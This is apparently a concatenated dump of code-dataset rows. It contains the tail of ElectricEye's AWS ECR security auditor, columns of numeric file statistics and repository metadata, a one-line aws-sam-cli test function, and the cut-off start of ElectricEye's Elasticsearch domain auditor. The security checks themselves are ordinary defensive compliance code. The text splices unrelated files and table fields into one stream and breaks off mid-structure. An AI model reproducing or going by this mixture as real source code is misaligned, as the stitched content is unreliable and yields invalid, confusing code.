"Types": ["Software and Configuration Checks/AWS Security Best Practices"],
"FirstObservedAt": iso8601Time,
"CreatedAt": iso8601Time,
"UpdatedAt": iso8601Time,
"Severity": {"Label": "MEDIUM"},
"Confidence": 99,
"Title": "[ECR.3] ECR repositories should be have a repository policy configured",
"Description": "ECR repository "
+ repoName
+ " does not have a repository policy configured. Refer to the remediation instructions if this configuration is not intended",
"Remediation": {
"Recommendation": {
"Text": "If your repository should be configured to have a repository policy refer to the Amazon ECR Repository Policies section in the Amazon ECR User Guide",
"Url": "https://docs.aws.amazon.com/AmazonECR/latest/userguide/repository-policies.html",
}
},
"ProductFields": {"Product Name": "ElectricEye"},
"Resources": [
{
"Type": "AwsEcrRepository",
"Id": repoArn,
"Partition": awsPartition,
"Region": awsRegion,
"Details": {"Other": {"RepositoryName": repoName}},
}
],
"Compliance": {
"Status": "FAILED",
"RelatedRequirements": [
"NIST CSF PR.AC-6",
"NIST SP 800-53 AC-1",
"NIST SP 800-53 AC-2",
"NIST SP 800-53 AC-3",
"NIST SP 800-53 AC-16",
"NIST SP 800-53 AC-19",
"NIST SP 800-53 AC-24",
"NIST SP 800-53 IA-1",
"NIST SP 800-53 IA-2",
"NIST SP 800-53 IA-4",
"NIST SP 800-53 IA-5",
"NIST SP 800-53 IA-8",
"NIST SP 800-53 PE-2",
"NIST SP 800-53 PS-3",
"AICPA TSC CC6.1",
"ISO 27001:2013 A.7.1.1",
"ISO 27001:2013 A.9.2.1",
],
},
"Workflow": {"Status": "NEW"},
"RecordState": "ACTIVE",
}
yield finding
@registry.register_check("ecr")
def ecr_latest_image_vuln_check(cache: dict, awsAccountId: str, awsRegion: str, awsPartition: str) -> dict:
"""[ECR.4] The latest image in an ECR Repository should not have any vulnerabilities"""
response = describe_repositories(cache)
myRepos = response["repositories"]
for repo in myRepos:
repoArn = str(repo["repositoryArn"])
repoName = str(repo["repositoryName"])
scanningConfig = str(repo["imageScanningConfiguration"]["scanOnPush"])
if scanningConfig == "True":
try:
response = ecr.describe_images(
repositoryName=repoName, filter={"tagStatus": "TAGGED"}, maxResults=1000,
)
for images in response["imageDetails"]:
imageDigest = str(images["imageDigest"])
# use the first tag only as we need it to create the canonical ID for the Resource.Id in the ASFF for the Container Resource.Type
imageTag = str(images["imageTags"][0])
imageVulnCheck = str(
images["imageScanFindingsSummary"]["findingSeverityCounts"]
)
# ISO Time
iso8601Time = (
datetime.datetime.utcnow()
.replace(tzinfo=datetime.timezone.utc)
.isoformat()
)
if imageVulnCheck != "{}":
vulnDeepLink = (
"https://console.aws.amazon.com/ecr/repositories/"
+ repoName
+ "/image/"
+ imageDigest
+ "/scan-results?region="
+ awsRegion
)
finding = {
"SchemaVersion": "2018-10-08",
"Id": repoName + "/" + imageDigest + "/ecr-latest-image-vuln-check",
"ProductArn": f"arn:{awsPartition}:securityhub:{awsRegion}:{awsAccountId}:product/{awsAccountId}/default",
"GeneratorId": imageDigest,
"AwsAccountId": awsAccountId,
"Types": [
"Software and Configuration Checks/Vulnerabilities/CVE",
"Software and Configuration Checks/AWS Security Best Practices",
],
"FirstObservedAt": iso8601Time,
"CreatedAt": iso8601Time,
"UpdatedAt": iso8601Time,
"Severity": {"Label": "MEDIUM"},
"Confidence": 99,
"Title": "[ECR.4] The latest image in an ECR Repository should not have any vulnerabilities",
"Description": "The latest image in the ECR repository "
+ repoName
+ " has the following vulnerabilities reported: "
+ imageVulnCheck
+ ". Refer to the SourceUrl or Remediation.Recommendation.Url to review the specific vulnerabilities and remediation information from ECR.",
"Remediation": {
"Recommendation": {
"Text": "Click here to navigate to the ECR Vulnerability console for this image",
"Url": vulnDeepLink,
}
},
"SourceUrl": vulnDeepLink,
"ProductFields": {"Product Name": "ElectricEye"},
"Resources": [
{
"Type": "Container",
"Id": repoName + ":" + imageTag,
"Partition": awsPartition,
"Region": awsRegion,
"Details": {
"Container": {
"Name": repoName + ":" + imageTag,
"ImageId": imageDigest,
},
"Other": {
"RepositoryName": repoName,
"RepositoryArn": repoArn,
},
},
}
],
"Compliance": {
"Status": "FAILED",
"RelatedRequirements": [
"NIST CSF DE.CM-8",
"NIST SP 800-53 RA-5",
"AICPA TSC CC7.1",
"ISO 27001:2013 A.12.6.1",
],
},
"Workflow": {"Status": "NEW"},
"RecordState": "ACTIVE",
}
yield finding
else:
finding = {
"SchemaVersion": "2018-10-08",
"Id": repoName + "/" + imageDigest + "/ecr-latest-image-vuln-check",
"ProductArn": f"arn:{awsPartition}:securityhub:{awsRegion}:{awsAccountId}:product/{awsAccountId}/default",
"GeneratorId": imageDigest,
"AwsAccountId": awsAccountId,
"Types": [
"Software and Configuration Checks/Vulnerabilities/CVE",
"Software and Configuration Checks/AWS Security Best Practices",
],
"FirstObservedAt": iso8601Time,
"CreatedAt": iso8601Time,
"UpdatedAt": iso8601Time,
"Severity": {"Label": "INFORMATIONAL"},
"Confidence": 99,
"Title": "[ECR.4] The latest image in an ECR Repository should not have any vulnerabilities",
"Description": "The latest image in the ECR repository "
+ repoName
+ " does not have any vulnerabilities reported.",
"ProductFields": {"Product Name": "ElectricEye"},
"Resources": [
{
"Type": "Container",
"Id": repoName + ":" + imageTag,
"Partition": awsPartition,
"Region": awsRegion,
"Details": {
"Container": {
"Name": repoName + ":" + imageTag,
"ImageId": imageDigest,
},
"Other": {
"RepositoryName": repoName,
"RepositoryArn": repoArn,
},
},
}
],
"Compliance": {
"Status": "PASSED",
"RelatedRequirements": [
"NIST CSF DE.CM-8",
"NIST SP 800-53 RA-5",
"AICPA TSC CC7.1",
"ISO 27001:2013 A.12.6.1",
],
},
"Workflow": {"Status": "RESOLVED"},
"RecordState": "ARCHIVED",
}
yield finding
except Exception as e:
print(e)
else:
pass
@registry.register_check("ecr")
def ecr_registry_policy_check(cache: dict, awsAccountId: str, awsRegion: str, awsPartition: str) -> dict:
"""[ECR.5] ECR Registires should be have a registry policy configured to allow for cross-account recovery"""
iso8601Time = datetime.datetime.utcnow().replace(tzinfo=datetime.timezone.utc).isoformat()
try:
ecr.get_registry_policy()
# This is a passing check
finding = {
"SchemaVersion": "2018-10-08",
"Id": awsAccountId + awsRegion + "/ecr-registry-access-policy-check",
"ProductArn": f"arn:{awsPartition}:securityhub:{awsRegion}:{awsAccountId}:product/{awsAccountId}/default",
"GeneratorId": awsAccountId + awsRegion,
"AwsAccountId": awsAccountId,
"Types": ["Software and Configuration Checks/AWS Security Best Practices"],
"FirstObservedAt": iso8601Time,
"CreatedAt": iso8601Time,
"UpdatedAt": iso8601Time,
"Severity": {"Label": "INFORMATIONAL"},
"Confidence": 99,
"Title": "[ECR.5] ECR Registires should be have a registry policy configured to allow for cross-account recovery",
"Description": "ECR Registry "
+ awsAccountId
+ " in Region "
+ awsRegion
+ " has a registry policy configured.",
"Remediation": {
"Recommendation": {
"Text": "If your Registry should be configured to have a Registry policy refer to the Private registry permissions section in the Amazon ECR User Guide",
"Url": "https://docs.aws.amazon.com/AmazonECR/latest/userguide/registry-permissions.html"
}
},
"ProductFields": {"Product Name": "ElectricEye"},
"Resources": [
{
"Type": "AwsEcrRegistry",
"Id": awsAccountId,
"Partition": awsPartition,
"Region": awsRegion,
"Details": {"Other": {"RegistryId": awsAccountId}},
}
],
"Compliance": {
"Status": "PASSED",
"RelatedRequirements": [
"NIST CSF ID.BE-5",
"NIST CSF PR.PT-5",
"NIST SP 800-53 CP-2",
"NIST SP 800-53 CP-11",
"NIST SP 800-53 SA-13",
"NIST SP 800-53 SA14",
"AICPA TSC CC3.1",
"AICPA TSC A1.2",
"ISO 27001:2013 A.11.1.4",
"ISO 27001:2013 A.17.1.1",
"ISO 27001:2013 A.17.1.2",
"ISO 27001:2013 A.17.2.1",
]
},
"Workflow": {"Status": "RESOLVED"},
"RecordState": "ARCHIVED",
}
yield finding
except botocore.exceptions.ClientError as error:
if error.response["Error"]["Code"] == "RegistryPolicyNotFoundException":
# this is a failing check
finding = {
"SchemaVersion": "2018-10-08",
"Id": awsAccountId + awsRegion + "/ecr-registry-access-policy-check",
"ProductArn": f"arn:{awsPartition}:securityhub:{awsRegion}:{awsAccountId}:product/{awsAccountId}/default",
"GeneratorId": awsAccountId + awsRegion,
"AwsAccountId": awsAccountId,
"Types": ["Software and Configuration Checks/AWS Security Best Practices"],
"FirstObservedAt": iso8601Time,
"CreatedAt": iso8601Time,
"UpdatedAt": iso8601Time,
"Severity": {"Label": "LOW"},
"Confidence": 99,
"Title": "[ECR.5] ECR Registires should be have a registry policy configured to allow for cross-account recovery",
"Description": "ECR Registry "
+ awsAccountId
+ " in Region "
+ awsRegion
+ " does not have a registry policy configured. ECR uses a registry policy to grant permissions to an AWS principal, allowing the replication of the repositories from a source registry to your registry. By default, you have permission to configure cross-Region replication within your own registry. You only need to configure the registry policy if you're granting another account permission to replicate contents to your registry. Refer to the remediation instructions if this configuration is not intended",
"Remediation": {
"Recommendation": {
"Text": "If your Registry should be configured to have a Registry policy refer to the Private registry permissions section in the Amazon ECR User Guide",
"Url": "https://docs.aws.amazon.com/AmazonECR/latest/userguide/registry-permissions.html"
}
},
"ProductFields": {"Product Name": "ElectricEye"},
"Resources": [
{
"Type": "AwsEcrRegistry",
"Id": awsAccountId,
"Partition": awsPartition,
"Region": awsRegion,
"Details": {"Other": {"RegistryId": awsAccountId}},
}
],
"Compliance": {
"Status": "FAILED",
"RelatedRequirements": [
"NIST CSF ID.BE-5",
"NIST CSF PR.PT-5",
"NIST SP 800-53 CP-2",
"NIST SP 800-53 CP-11",
"NIST SP 800-53 SA-13",
"NIST SP 800-53 SA14",
"AICPA TSC CC3.1",
"AICPA TSC A1.2",
"ISO 27001:2013 A.11.1.4",
"ISO 27001:2013 A.17.1.1",
"ISO 27001:2013 A.17.1.2",
"ISO 27001:2013 A.17.2.1",
]
},
"Workflow": {"Status": "NEW"},
"RecordState": "ACTIVE",
}
yield finding
else:
print(error)
except Exception as e:
print(e)
@registry.register_check("ecr")
def ecr_registry_backup_rules_check(cache: dict, awsAccountId: str, awsRegion: str, awsPartition: str) -> dict:
"""[ECR.6] ECR Registires should use image replication to promote disaster recovery readiness"""
iso8601Time = datetime.datetime.utcnow().replace(tzinfo=datetime.timezone.utc).isoformat()
if str(ecr.describe_registry()["replicationConfiguration"]["rules"]) == "[]":
# This is a failing check
finding = {
"SchemaVersion": "2018-10-08",
"Id": awsAccountId + awsRegion + "/ecr-registry-image-replication-check",
"ProductArn": f"arn:{awsPartition}:securityhub:{awsRegion}:{awsAccountId}:product/{awsAccountId}/default",
"GeneratorId": awsAccountId + awsRegion,
"AwsAccountId": awsAccountId,
"Types": ["Software and Configuration Checks/AWS Security Best Practices"],
"FirstObservedAt": iso8601Time,
"CreatedAt": iso8601Time,
"UpdatedAt": iso8601Time,
"Severity": {"Label": "LOW"},
"Confidence": 99,
"Title": "[ECR.6] ECR Registires should use image replication to promote disaster recovery readiness",
"Description": "ECR Registry "
+ awsAccountId
+ " in Region "
+ awsRegion
+ " does not use Image replication. Registries can be configured to backup images to other Regions within your own Account or to other AWS Accounts to aid in disaster recovery readiness. Refer to the remediation instructions if this configuration is not intended",
"Remediation": {
"Recommendation": {
"Text": "If your Registry should be configured to for Private image replication refer to the Private image replication section in the Amazon ECR User Guide",
"Url": "https://docs.aws.amazon.com/AmazonECR/latest/userguide/replication.html"
}
},
"ProductFields": {"Product Name": "ElectricEye"},
"Resources": [
{
"Type": "AwsEcrRegistry",
"Id": awsAccountId,
"Partition": awsPartition,
"Region": awsRegion,
"Details": {"Other": {"RegistryId": awsAccountId}},
}
],
"Compliance": {
"Status": "FAILED",
"RelatedRequirements": [
"NIST CSF ID.BE-5",
"NIST CSF PR.PT-5",
"NIST SP 800-53 CP-2",
"NIST SP 800-53 CP-11",
"NIST SP 800-53 SA-13",
"NIST SP 800-53 SA14",
"AICPA TSC CC3.1",
"AICPA TSC A1.2",
"ISO 27001:2013 A.11.1.4",
"ISO 27001:2013 A.17.1.1",
"ISO 27001:2013 A.17.1.2",
"ISO 27001:2013 A.17.2.1",
]
},
"Workflow": {"Status": "NEW"},
"RecordState": "ACTIVE"
}
yield finding
else:
finding = {
"SchemaVersion": "2018-10-08",
"Id": awsAccountId + awsRegion + "/ecr-registry-image-replication-check",
"ProductArn": f"arn:{awsPartition}:securityhub:{awsRegion}:{awsAccountId}:product/{awsAccountId}/default",
"GeneratorId": awsAccountId,
"AwsAccountId": awsAccountId,
"Types": ["Software and Configuration Checks/AWS Security Best Practices"],
"FirstObservedAt": iso8601Time,
"CreatedAt": iso8601Time,
"UpdatedAt": iso8601Time,
"Severity": {"Label": "INFORMATIONAL"},
"Confidence": 99,
"Title": "[ECR.6] ECR Registires should use image replication to promote disaster recovery readiness",
"Description": "ECR Registry "
+ awsAccountId
+ " in Region "
+ awsRegion
+ " uses Image replication.",
"Remediation": {
"Recommendation": {
"Text": "If your Registry should be configured to for Private image replication refer to the Private image replication section in the Amazon ECR User Guide",
"Url": "https://docs.aws.amazon.com/AmazonECR/latest/userguide/replication.html"
}
},
"ProductFields": {"Product Name": "ElectricEye"},
"Resources": [
{
"Type": "AwsEcrRegistry",
"Id": awsAccountId,
"Partition": awsPartition,
"Region": awsRegion,
"Details": {"Other": {"RegistryId": awsAccountId}},
}
],
"Compliance": {
"Status": "PASSED",
"RelatedRequirements": [
"NIST CSF ID.BE-5",
"NIST CSF PR.PT-5",
"NIST SP 800-53 CP-2",
"NIST SP 800-53 CP-11",
"NIST SP 800-53 SA-13",
"NIST SP 800-53 SA14",
"AICPA TSC CC3.1",
"AICPA TSC A1.2",
"ISO 27001:2013 A.11.1.4",
"ISO 27001:2013 A.17.1.1",
"ISO 27001:2013 A.17.1.2",
"ISO 27001:2013 A.17.2.1",
]
},
"Workflow": {"Status": "RESOLVED"},
"RecordState": "ARCHIVED"
}
yield finding
| 49.812821
| 525
| 0.466644
| 3,165
| 38,854
| 5.713428
| 0.107425
| 0.01659
| 0.024885
| 0.030415
| 0.85749
| 0.854449
| 0.848421
| 0.840568
| 0.840568
| 0.836753
| 0
| 0.048538
| 0.429454
| 38,854
| 780
| 526
| 49.812821
| 0.767187
| 0.041952
| 0
| 0.799728
| 0
| 0.02861
| 0.387979
| 0.045255
| 0
| 0
| 0
| 0
| 0
| 1
| 0.009537
| false
| 0.009537
| 0.00545
| 0
| 0.017711
| 0.004087
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
1998a450d7cad5cff37b5dc708a3fe2a61a5a10f
| 71
|
py
|
Python
|
tests/integration/testdata/invoke/layers/custom_layer/my_layer/simple_python.py
|
renanmontebelo/aws-sam-cli
|
b5cfc46aa9726b5cd006df8ecc08d1b4eedeb9ea
|
[
"BSD-2-Clause",
"Apache-2.0"
] | 2,959
|
2018-05-08T21:48:56.000Z
|
2020-08-24T14:35:39.000Z
|
tests/integration/testdata/invoke/layers/custom_layer/my_layer/simple_python.py
|
renanmontebelo/aws-sam-cli
|
b5cfc46aa9726b5cd006df8ecc08d1b4eedeb9ea
|
[
"BSD-2-Clause",
"Apache-2.0"
] | 1,469
|
2018-05-08T22:44:28.000Z
|
2020-08-24T20:19:24.000Z
|
tests/integration/testdata/invoke/layers/custom_layer/my_layer/simple_python.py
|
renanmontebelo/aws-sam-cli
|
b5cfc46aa9726b5cd006df8ecc08d1b4eedeb9ea
|
[
"BSD-2-Clause",
"Apache-2.0"
] | 642
|
2018-05-08T22:09:19.000Z
|
2020-08-17T09:04:37.000Z
|
def layer_ping():
return "This is a Layer Ping from simple_python"
| 23.666667
| 52
| 0.732394
| 12
| 71
| 4.166667
| 0.833333
| 0.36
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.197183
| 71
| 2
| 53
| 35.5
| 0.877193
| 0
| 0
| 0
| 0
| 0
| 0.549296
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| true
| 0
| 0
| 0.5
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 1
| 1
| 0
|
0
| 7
|
270d24345262b87296bac736a240a608dbc05890
| 68,619
|
py
|
Python
|
eeauditor/auditors/aws/Amazon_ElasticsearchService_Auditor.py
|
kbhagi/ElectricEye
|
31960e1e1cfb75c5d354844ea9e07d5295442823
|
[
"Apache-2.0"
] | 442
|
2020-03-15T20:56:36.000Z
|
2022-03-31T22:13:07.000Z
|
eeauditor/auditors/aws/Amazon_ElasticsearchService_Auditor.py
|
kbhagi/ElectricEye
|
31960e1e1cfb75c5d354844ea9e07d5295442823
|
[
"Apache-2.0"
] | 57
|
2020-03-15T22:09:56.000Z
|
2022-03-31T13:17:06.000Z
|
eeauditor/auditors/aws/Amazon_ElasticsearchService_Auditor.py
|
kbhagi/ElectricEye
|
31960e1e1cfb75c5d354844ea9e07d5295442823
|
[
"Apache-2.0"
] | 59
|
2020-03-15T21:19:10.000Z
|
2022-03-31T15:01:31.000Z
|
#This file is part of ElectricEye.
#SPDX-License-Identifier: Apache-2.0
#Licensed to the Apache Software Foundation (ASF) under one
#or more contributor license agreements. See the NOTICE file
#distributed with this work for additional information
#regarding copyright ownership. The ASF licenses this file
#to you under the Apache License, Version 2.0 (the
#"License"); you may not use this file except in compliance
#with the License. You may obtain a copy of the License at
#http://www.apache.org/licenses/LICENSE-2.0
#Unless required by applicable law or agreed to in writing,
#software distributed under the License is distributed on an
#"AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
#KIND, either express or implied. See the License for the
#specific language governing permissions and limitations
#under the License.
import boto3
import datetime
from check_register import CheckRegister
registry = CheckRegister()
# import boto3 clients
elasticsearch = boto3.client("es")
# loop through elasticsearch domains
def list_domain_names(cache):
response = cache.get("list_domain_names")
if response:
return response
cache["list_domain_names"] = elasticsearch.list_domain_names()
return cache["list_domain_names"]
@registry.register_check("es")
def dedicated_master_check(cache: dict, awsAccountId: str, awsRegion: str, awsPartition: str) -> dict:
"""[Elasticsearch.1] Elasticsearch Service domains should use dedicated master nodes"""
response = list_domain_names(cache)
myDomainNames = response["DomainNames"]
for domains in myDomainNames:
esDomainName = str(domains["DomainName"])
response = elasticsearch.describe_elasticsearch_domain(DomainName=esDomainName)
esVersion = str(response["DomainStatus"]["ElasticsearchVersion"])
domainId = str(response["DomainStatus"]["DomainId"])
domainArn = str(response["DomainStatus"]["ARN"])
dedicatedMasterCheck = str(
response["DomainStatus"]["ElasticsearchClusterConfig"]["DedicatedMasterEnabled"]
)
# ISO Time
iso8601Time = datetime.datetime.utcnow().replace(tzinfo=datetime.timezone.utc).isoformat()
if dedicatedMasterCheck == "False":
finding = {
"SchemaVersion": "2018-10-08",
"Id": domainArn + "/elasticsearch-dedicated-master-check",
"ProductArn": f"arn:{awsPartition}:securityhub:{awsRegion}:{awsAccountId}:product/{awsAccountId}/default",
"GeneratorId": domainArn,
"AwsAccountId": awsAccountId,
"Types": ["Software and Configuration Checks/AWS Security Best Practices"],
"FirstObservedAt": iso8601Time,
"CreatedAt": iso8601Time,
"UpdatedAt": iso8601Time,
"Severity": {"Label": "LOW"},
"Confidence": 99,
"Title": "[Elasticsearch.1] Elasticsearch Service domains should use dedicated master nodes",
"Description": "Elasticsearch Service domain "
+ esDomainName
+ " does not use dedicated master nodes. Refer to the remediation instructions if this configuration is not intended",
"Remediation": {
"Recommendation": {
"Text": "If your domain should dedicated master nodes enabled refer to the Configuring Amazon ES Domains section of the Amazon Elasticsearch Service Developer Guide",
"Url": "https://docs.aws.amazon.com/elasticsearch-service/latest/developerguide/es-createupdatedomains.html#es-createdomains-configure-cluster",
}
},
"ProductFields": {"Product Name": "ElectricEye"},
"Resources": [
{
"Type": "AwsElasticSearchDomain",
"Id": domainArn,
"Partition": awsPartition,
"Region": awsRegion,
"Details": {
"AwsElasticSearchDomain": {
"DomainId": domainId,
"DomainName": esDomainName,
"ElasticsearchVersion": esVersion,
}
},
}
],
"Compliance": {
"Status": "FAILED",
"RelatedRequirements": [
"NIST CSF ID.BE-5",
"NIST CSF PR.PT-5",
"NIST SP 800-53 CP-2",
"NIST SP 800-53 CP-11",
"NIST SP 800-53 SA-13",
"NIST SP 800-53 SA14",
"AICPA TSC CC3.1",
"AICPA TSC A1.2",
"ISO 27001:2013 A.11.1.4",
"ISO 27001:2013 A.17.1.1",
"ISO 27001:2013 A.17.1.2",
"ISO 27001:2013 A.17.2.1",
],
},
"Workflow": {"Status": "NEW"},
"RecordState": "ACTIVE",
}
yield finding
else:
finding = {
"SchemaVersion": "2018-10-08",
"Id": domainArn + "/elasticsearch-dedicated-master-check",
"ProductArn": f"arn:{awsPartition}:securityhub:{awsRegion}:{awsAccountId}:product/{awsAccountId}/default",
"GeneratorId": domainArn,
"AwsAccountId": awsAccountId,
"Types": ["Software and Configuration Checks/AWS Security Best Practices"],
"FirstObservedAt": iso8601Time,
"CreatedAt": iso8601Time,
"UpdatedAt": iso8601Time,
"Severity": {"Label": "INFORMATIONAL"},
"Confidence": 99,
"Title": "[Elasticsearch.1] Elasticsearch Service domains should use dedicated master nodes",
"Description": "Elasticsearch Service domain "
+ esDomainName
+ " uses dedicated master nodes.",
"Remediation": {
"Recommendation": {
"Text": "If your domain should dedicated master nodes enabled refer to the Configuring Amazon ES Domains section of the Amazon Elasticsearch Service Developer Guide",
"Url": "https://docs.aws.amazon.com/elasticsearch-service/latest/developerguide/es-createupdatedomains.html#es-createdomains-configure-cluster",
}
},
"ProductFields": {"Product Name": "ElectricEye"},
"Resources": [
{
"Type": "AwsElasticSearchDomain",
"Id": domainArn,
"Partition": awsPartition,
"Region": awsRegion,
"Details": {
"AwsElasticSearchDomain": {
"DomainId": domainId,
"DomainName": esDomainName,
"ElasticsearchVersion": esVersion,
}
},
}
],
"Compliance": {
"Status": "PASSED",
"RelatedRequirements": [
"NIST CSF ID.BE-5",
"NIST CSF PR.PT-5",
"NIST SP 800-53 CP-2",
"NIST SP 800-53 CP-11",
"NIST SP 800-53 SA-13",
"NIST SP 800-53 SA14",
"AICPA TSC CC3.1",
"AICPA TSC A1.2",
"ISO 27001:2013 A.11.1.4",
"ISO 27001:2013 A.17.1.1",
"ISO 27001:2013 A.17.1.2",
"ISO 27001:2013 A.17.2.1",
],
},
"Workflow": {"Status": "RESOLVED"},
"RecordState": "ARCHIVED",
}
yield finding
@registry.register_check("es")
def cognito_check(cache: dict, awsAccountId: str, awsRegion: str, awsPartition: str) -> dict:
"""[Elasticsearch.2] Elasticsearch Service domains should use Cognito authentication for Kibana"""
response = list_domain_names(cache)
myDomainNames = response["DomainNames"]
for domains in myDomainNames:
esDomainName = str(domains["DomainName"])
response = elasticsearch.describe_elasticsearch_domain(DomainName=esDomainName)
esVersion = str(response["DomainStatus"]["ElasticsearchVersion"])
domainId = str(response["DomainStatus"]["DomainId"])
domainArn = str(response["DomainStatus"]["ARN"])
try:
cognitoEnabledCheck = str(response["DomainStatus"]["CognitoOptions"]["Enabled"])
except:
cognitoEnabledCheck = "False"
# ISO Time
iso8601Time = datetime.datetime.utcnow().replace(tzinfo=datetime.timezone.utc).isoformat()
if cognitoEnabledCheck == "False":
finding = {
"SchemaVersion": "2018-10-08",
"Id": domainArn + "/elasticsearch-cognito-auth-check",
"ProductArn": f"arn:{awsPartition}:securityhub:{awsRegion}:{awsAccountId}:product/{awsAccountId}/default",
"GeneratorId": domainArn,
"AwsAccountId": awsAccountId,
"Types": ["Software and Configuration Checks/AWS Security Best Practices"],
"FirstObservedAt": iso8601Time,
"CreatedAt": iso8601Time,
"UpdatedAt": iso8601Time,
"Severity": {"Label": "MEDIUM"},
"Confidence": 99,
"Title": "[Elasticsearch.2] Elasticsearch Service domains should use Cognito authentication for Kibana",
"Description": "Elasticsearch Service domain "
+ esDomainName
+ " does not use Cognito authentication for Kibana. Refer to the remediation instructions if this configuration is not intended",
"Remediation": {
"Recommendation": {
"Text": "If your domain should use Cognito authentication for Kibana refer to the Amazon Cognito Authentication for Kibana section of the Amazon Elasticsearch Service Developer Guide",
"Url": "https://docs.aws.amazon.com/elasticsearch-service/latest/developerguide/es-cognito-auth.html",
}
},
"ProductFields": {"Product Name": "ElectricEye"},
"Resources": [
{
"Type": "AwsElasticSearchDomain",
"Id": domainArn,
"Partition": awsPartition,
"Region": awsRegion,
"Details": {
"AwsElasticSearchDomain": {
"DomainId": domainId,
"DomainName": esDomainName,
"ElasticsearchVersion": esVersion,
}
},
}
],
"Compliance": {
"Status": "FAILED",
"RelatedRequirements": [
"NIST CSF PR.AC-6",
"NIST SP 800-53 AC-1",
"NIST SP 800-53 AC-2",
"NIST SP 800-53 AC-3",
"NIST SP 800-53 AC-16",
"NIST SP 800-53 AC-19",
"NIST SP 800-53 AC-24",
"NIST SP 800-53 IA-1",
"NIST SP 800-53 IA-2",
"NIST SP 800-53 IA-4",
"NIST SP 800-53 IA-5",
"NIST SP 800-53 IA-8",
"NIST SP 800-53 PE-2",
"NIST SP 800-53 PS-3",
"AICPA TSC CC6.1",
"ISO 27001:2013 A.7.1.1",
"ISO 27001:2013 A.9.2.1",
],
},
"Workflow": {"Status": "NEW"},
"RecordState": "ACTIVE",
}
yield finding
else:
finding = {
"SchemaVersion": "2018-10-08",
"Id": domainArn + "/elasticsearch-cognito-auth-check",
"ProductArn": f"arn:{awsPartition}:securityhub:{awsRegion}:{awsAccountId}:product/{awsAccountId}/default",
"GeneratorId": domainArn,
"AwsAccountId": awsAccountId,
"Types": ["Software and Configuration Checks/AWS Security Best Practices"],
"FirstObservedAt": iso8601Time,
"CreatedAt": iso8601Time,
"UpdatedAt": iso8601Time,
"Severity": {"Label": "INFORMATIONAL"},
"Confidence": 99,
"Title": "[Elasticsearch.2] Elasticsearch Service domains should use Cognito authentication for Kibana",
"Description": "Elasticsearch Service domain "
+ esDomainName
+ " uses Cognito authentication for Kibana.",
"Remediation": {
"Recommendation": {
"Text": "If your domain should use Cognito authentication for Kibana refer to the Amazon Cognito Authentication for Kibana section of the Amazon Elasticsearch Service Developer Guide",
"Url": "https://docs.aws.amazon.com/elasticsearch-service/latest/developerguide/es-cognito-auth.html",
}
},
"ProductFields": {"Product Name": "ElectricEye"},
"Resources": [
{
"Type": "AwsElasticSearchDomain",
"Id": domainArn,
"Partition": awsPartition,
"Region": awsRegion,
"Details": {
"AwsElasticSearchDomain": {
"DomainId": domainId,
"DomainName": esDomainName,
"ElasticsearchVersion": esVersion,
}
},
}
],
"Compliance": {
"Status": "PASSED",
"RelatedRequirements": [
"NIST CSF PR.AC-6",
"NIST SP 800-53 AC-1",
"NIST SP 800-53 AC-2",
"NIST SP 800-53 AC-3",
"NIST SP 800-53 AC-16",
"NIST SP 800-53 AC-19",
"NIST SP 800-53 AC-24",
"NIST SP 800-53 IA-1",
"NIST SP 800-53 IA-2",
"NIST SP 800-53 IA-4",
"NIST SP 800-53 IA-5",
"NIST SP 800-53 IA-8",
"NIST SP 800-53 PE-2",
"NIST SP 800-53 PS-3",
"AICPA TSC CC6.1",
"ISO 27001:2013 A.7.1.1",
"ISO 27001:2013 A.9.2.1",
],
},
"Workflow": {"Status": "RESOLVED"},
"RecordState": "ARCHIVED",
}
yield finding
@registry.register_check("es")
def encryption_at_rest_check(cache: dict, awsAccountId: str, awsRegion: str, awsPartition: str) -> dict:
"""[Elasticsearch.3] Elasticsearch Service domains should be encrypted at rest"""
response = list_domain_names(cache)
myDomainNames = response["DomainNames"]
for domains in myDomainNames:
esDomainName = str(domains["DomainName"])
response = elasticsearch.describe_elasticsearch_domain(DomainName=esDomainName)
esVersion = str(response["DomainStatus"]["ElasticsearchVersion"])
domainId = str(response["DomainStatus"]["DomainId"])
domainArn = str(response["DomainStatus"]["ARN"])
encryptionAtRestCheck = str(response["DomainStatus"]["EncryptionAtRestOptions"]["Enabled"])
# ISO Time
iso8601Time = datetime.datetime.utcnow().replace(tzinfo=datetime.timezone.utc).isoformat()
if encryptionAtRestCheck == "False":
finding = {
"SchemaVersion": "2018-10-08",
"Id": domainArn + "/elasticsearch-encryption-at-rest-check",
"ProductArn": f"arn:{awsPartition}:securityhub:{awsRegion}:{awsAccountId}:product/{awsAccountId}/default",
"GeneratorId": domainArn,
"AwsAccountId": awsAccountId,
"Types": [
"Software and Configuration Checks/AWS Security Best Practices",
"Effects/Data Exposure",
],
"FirstObservedAt": iso8601Time,
"CreatedAt": iso8601Time,
"UpdatedAt": iso8601Time,
"Severity": {"Label": "HIGH"},
"Confidence": 99,
"Title": "[Elasticsearch.3] Elasticsearch Service domains should be encrypted at rest",
"Description": "Elasticsearch Service domain "
+ esDomainName
+ " is not encrypted at rest. You cannot configure existing domains to use the feature. To enable the feature, you must create another domain and migrate your data. Encryption of data at rest requires Elasticsearch 5.1 or later",
"Remediation": {
"Recommendation": {
"Text": "You cannot configure existing domains to use the feature. To enable the feature, you must create another domain and migrate your data. Encryption of data at rest requires Elasticsearch 5.1 or later.",
"Url": "https://docs.aws.amazon.com/elasticsearch-service/latest/developerguide/encryption-at-rest.html#enabling-ear",
}
},
"ProductFields": {"Product Name": "ElectricEye"},
"Resources": [
{
"Type": "AwsElasticSearchDomain",
"Id": domainArn,
"Partition": awsPartition,
"Region": awsRegion,
"Details": {
"AwsElasticSearchDomain": {
"DomainId": domainId,
"DomainName": esDomainName,
"ElasticsearchVersion": esVersion,
